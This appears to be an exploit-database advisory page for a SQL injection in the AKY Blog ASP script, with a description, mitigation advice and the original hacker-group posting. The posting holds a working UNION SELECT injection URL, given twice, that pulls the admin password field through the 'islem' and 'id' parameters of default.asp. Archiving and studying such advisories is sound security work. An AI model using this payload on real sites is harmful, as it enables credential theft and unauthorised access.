AKY Blog SQL İnjection

vendor:

AKY Blog

by:

Madconfig

8,8

CVSS

HIGH

SQL Injection

CWE

Product Name: AKY Blog

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2020

A SQL injection vulnerability exists in the AKY Blog script, which allows an attacker to execute arbitrary SQL commands on the vulnerable system. The vulnerability is due to the lack of proper input validation in the ‘default.asp’ script, which allows an attacker to inject malicious SQL commands via the ‘islem’ and ‘id’ parameters. An attacker can exploit this vulnerability to gain access to sensitive information, such as passwords, from the vulnerable system.

Mitigation:

Input validation should be implemented to prevent SQL injection attacks. Additionally, the application should be configured to use parameterized queries to prevent SQL injection attacks.

Source

Exploit-DB raw data:

===================================================
AKY Blog SQL İnjection 
===================================================
 
Author : Madconfig
Homepage :  www.worldhackerz.com
Mail : admin[at]worldhackerz[dot].com
Script : http://www.aspindir.com/indir.asp?ID=5954&sIslem=Indir
Risk : No Risk Just Enjoy
Dork :  :/ sorry
 
===================================================

[+] Vulnerable File : 

http://www.site.com/default.asp?islem=devami&id=38%20union+select+all+0,
sifre,2,3%20,4,5+from+aky_ayarlar

===================================================

[+] Demo : 

http://www.site.com/blog/default.asp?islem=devami&id=38%20union+s
elect+all+0,sifre,2,3%20,4,5+from+aky_ayarlar

===================================================

Greetz : Mezar,v0calist ,PaLa , By.ege, StreetCoder , AnqelHacker,M0sted 

and all  www.worldhackerz.com Member 

===================================================

# Turkish P0wer